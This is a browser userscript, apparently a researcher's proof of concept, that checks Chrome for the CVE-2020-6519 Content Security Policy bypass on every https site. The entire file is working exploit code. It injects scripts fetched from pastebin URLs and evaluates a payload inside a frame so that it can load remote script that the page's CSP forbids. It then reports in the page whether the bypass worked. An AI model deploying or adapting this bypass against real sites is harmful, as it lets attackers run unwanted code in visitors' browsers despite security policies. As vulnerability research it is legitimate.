// ==UserScript== // @name EXPLOIT-CVE-2020-6519 // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author Gal Weizman (gal@perimeterx.com) // @match https://*/* // @grant none // ==/UserScript== const cve_entire_func = function (fail = false) { top._CVE_START = true; function exploit () { message ('start running exploit'); top._MESSAGE = message; top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ'; top._xxx = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! 😥👎🏻😭"); }; top._yyy = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! 🥳👍🏻😁 (but this website's CSP is still not well configured though...)"); }; var payload = ` top.SUCCESS = true; var s = document.createElement("script"); s.src = top._CVE_URL; s.onload = top._xxx; s.onerror = top._yyy; document.body.appendChild(s); `; div2.innerHTML += ""; setTimeout (() => { if (!top.SUCCESS) { _XXX.contentWindow.eval (payload); } }); setTimeout (() => { message ( 'in case exploitation succeeded - an alert message originated by the forbidden script should pop up' ); message ('finish testing exploitability'); }, 500); } function css (color = 'greenyellow') { const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`; const style = document.createElement ('style'); style.id = 'CVE_STYLE'; style.textContent = content; document.head.appendChild (style); } function start () { message ('start testing exploitability'); document.body.prepend (div); document.body.prepend (div2); css (); exploit (); } function message () { const args = [].slice.call (arguments); console.log.apply (null, ['CVE-2020-6519-exploit: '].concat (args)); const p = document.createElement ('li'); p.innerText = args.join (' '); div.appendChild (p); } function getIsVulnerable () { if (isVulnerable !== undefined) return isVulnerable; const ua = navigator.userAgent; message ('User Agent: ', ua); const uaParts = ua.split (' '); for (var i = 0; i < uaParts.length; i++) { if (0 !== uaParts[i].indexOf ('Chrome')) continue; const version = uaParts[i].replace ('Chrome/', '').split ('.')[0]; isVulnerable = parseInt (version) < 84 && parseInt (version) > 72; message ( 'Chrome', isVulnerable ? 'is' : 'is not', 'vulnerable to CVE-2020-6519', isVulnerable ? '😥' : '😁', '(version', version, 'major)' ); break; } return isVulnerable; } let div, div2, isVulnerable; function init () { div2 = document.createElement ('div'); div2.id = 'b'; div2.style.display = 'none'; div = document.createElement ('div'); div.id = 'a'; div.setAttribute ('class', 'sticky'); const b = document.createElement ('b'); b.innerText = 'CVE-2020-6519-exploit: '; div.appendChild (b); //div.setAttribute('dir', 'rtl'); isVulnerable = getIsVulnerable (); if (fail) { document.body.prepend (div); document.body.prepend (div2); css (); message ( 'script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! 👏🏻🎉👏🏻🎉👏🏻' ); return; } const s = document.createElement ('script'); s.src = 'https://pastebin.com/raw/95f4NkAL'; s.onload = () => { document.body.prepend (div); document.body.prepend (div2); css ('red'); message ( 'this website is vulnerable due to poorley configured Content Security Policy' ); message ( 'therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it 🙄🙄🙄' ); }; s.onerror = () => { start (); }; document.head.appendChild (s); } init (); }; function check () { const s = document.createElement ('script'); s.textContent = '(' + cve_entire_func + '())'; top._CVE_START = false; setTimeout (() => { if (!_CVE_START) cve_entire_func (true); }, 1500); document.head.appendChild (s); } (function () { check (); }) ();